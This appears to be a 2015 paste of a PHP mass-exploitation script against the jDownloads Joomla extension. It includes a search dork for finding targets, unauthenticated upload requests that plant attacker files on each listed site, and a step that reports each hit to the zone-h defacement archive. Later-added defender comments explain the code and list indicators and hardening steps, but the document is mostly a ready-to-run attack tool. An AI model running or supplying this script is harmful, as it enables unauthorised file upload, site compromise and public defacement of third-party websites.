Kyfx

Jdownloads File Upload Vulnerability

May 20th, 2015
  1. Need targets make list.txt
  2.  
  3. Dork: "Powered by jDownloads"
  4.  
  5.  
  6. $file1='mt.zip';
  7. $file2='m.gif'; <--- Change that to your image for example kyfx.gif or png
  8.  
  9. Need PHP
  10.  
  11. Exploit:
  12. [PHP]<?php
  13. @set_time_limit(0);
      // Review note (defender's reading): this top-level section is the bulk driver.
      // The call above lifts PHP's execution time limit, with '@' suppressing any
      // warning, so the run is not cut short while it walks a long list.
      // The print statement below only emits the author's banner.
  14. print"
  15. _ _ _ _
  16. (_) __| | _____ ___ __ | | ___ __ _ __| |___
  17. | |/ _` |/ _ \ \ /\ / / '_ \| |/ _ \ / _` |/ _` / __|
  18. | | (_| | (_) \ V V /| | | | | (_) | (_| | (_| \__ \
  19. _/ |\__,_|\___/ \_/\_/ |_| |_|_|\___/ \__,_|\__,_|___/
  20. |__/ http://www.mustafatopal.org Must@f@
  21.  
  22. ";
  23.  
  24.  
  25. echo "\n";
  26.  
      // Reads one line from STDIN (fgets length argument 1024) and trims it; the
      // value is used below as the location of the list to load.
  27. echo "\t url list of sites : ";$x=trim(fgets(STDIN,1024));
  28.  
  29. echo "\n";
  30.  
      // Loads the whole list with errors suppressed and splits it on CRLF only.
      // Entries are not validated or de-duplicated before being handed to jd().
  31. $get=@file_get_contents($x);
  32. $ex=explode("\r\n",$get);
      // One jd() call per entry. jd() has no return statement, so the echo here
      // adds nothing to the output; all reporting happens inside jd().
  33. foreach($ex as $mag){
  34. echo "\t[+] scannign -->".$mag;
  35. echo jd($mag);
  36. }
  37. function jd($url){
      // Review note (defender's reading): jd() sends one unauthenticated multipart
      // POST to the jDownloads front-end upload view of $url, then decides from the
      // response body whether the upload was accepted. It returns nothing; results
      // are echoed. The page does not state which jDownloads versions are affected.
      //
      // What a site owner can look for, based on the values hard-coded below:
      //   - POST requests to index.php with option=com_jdownloads and an upload view,
      //     carrying the fixed Chrome/37 "X11; Linux i686" User-Agent string;
      //   - unexpected new files under /images/jdownloads/screenshots/.
      // General hardening: keep the extension updated, limit front-end uploads to
      // authenticated users, validate uploaded file types server-side, and deny
      // script execution in the upload directories.
  38.  
  39. $file1='mt.zip';
  40. $file2='m.gif';
  41.  
  42. $bbb='/index.php?option=com_jdownloads&Itemid=0&view=uplo ad';
  43. $sco=($url).($bbb);
  44.  
      // Form fields for the upload request. The two values written as "@$file..."
      // refer to the local files named above. 'description' appears twice in this
      // array literal; PHP keeps the later value.
  45. $post=array(
  46. 'name'=>'ur name','mail'=>'blackwolf_cw@hotmail.com','catlist' =>'1','file_upload'=>"@$file1",'filetitle' =>"lolz",
  47. 'description'=>"<p>zot</p>" ,'2d1a8f3bd0b5cf542e9312d74fc9766f'=>1,
  48. 'send'=>1,'senden'=>"Send file", 'description'=>"<p>qsdqsdqsdqsdqsdqsdqsd</p>",
  49. 'option'=>"com_jdownloads",'view'=>"upload",'pic_u pload'=>"@$file2"
  50. );
      // Request setup: response captured as a string, redirects followed, a 3-second
      // connect timeout, and a fixed desktop-browser User-Agent. No error from
      // curl_exec() is checked; a failed request simply yields a non-matching $data.
  51. $ch = curl_init ($sco);
  52. curl_setopt ($ch, CURLOPT_RETURNTRANSFER, TRUE);
  53. curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, TRUE);
  54. curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT,3 );
  55. curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.94 Safari/537.36");
  56. curl_setopt ($ch, CURLOPT_POST, TRUE);
  57. curl_setopt ($ch, CURLOPT_POSTFIELDS, $post);
  58. $data = curl_exec ($ch);
  59.  
  60. curl_close ($ch);
      // $final is the public URL where the second file would be served from if the
      // upload was stored in the screenshots directory.
  61. $path='/images/jdownloads/screenshots/';
  62. $final=($url).($path).($file2);
      // Success is inferred purely from response text: the component's
      // confirmation message or a green-font marker. The uploaded file itself is
      // never fetched to confirm it exists.
  63. if(eregi('The file was successfully transferred to the server!',$data)or preg_match("/color=\"green\">/",$data)){
  64. echo "\n\t\t".'yes -->'.$final."\n";
  65.  
      // On a presumed success the resulting URL is posted to a third-party
      // defacement-notification endpoint under the author's handle, so an affected
      // site may be publicly listed shortly after the upload.
  66. $ch = curl_init ("http://www.zone-h.com/notify/single");
  67. curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
  68. curl_setopt ($ch, CURLOPT_POST, 1);
  69. curl_setopt ($ch, CURLOPT_POSTFIELDS, "defacer=Must@f@&domain1=$final&hackmode=1&reason= 1");
  70. if (preg_match ("/color=\"red\">OK<\/font><\/li>/i", curl_exec ($ch))){
  71. echo "\t\tZone-h --> Ok ". "\n\n";
  72. }else{
  73. echo "\t\tZone-h --> No". "\n\n"; }
  74. curl_close ($ch);
  75.  
  76.  
  77. }else{
      // Any response without the success markers is reported as "not infected",
      // which here only means the upload was not confirmed.
  78. echo "\n\t\t".$url." --> not infected \n\n";
  79.  
  80.  
  81. }
  82. }
  83.  
  84.  
  85. ?>[/PHP]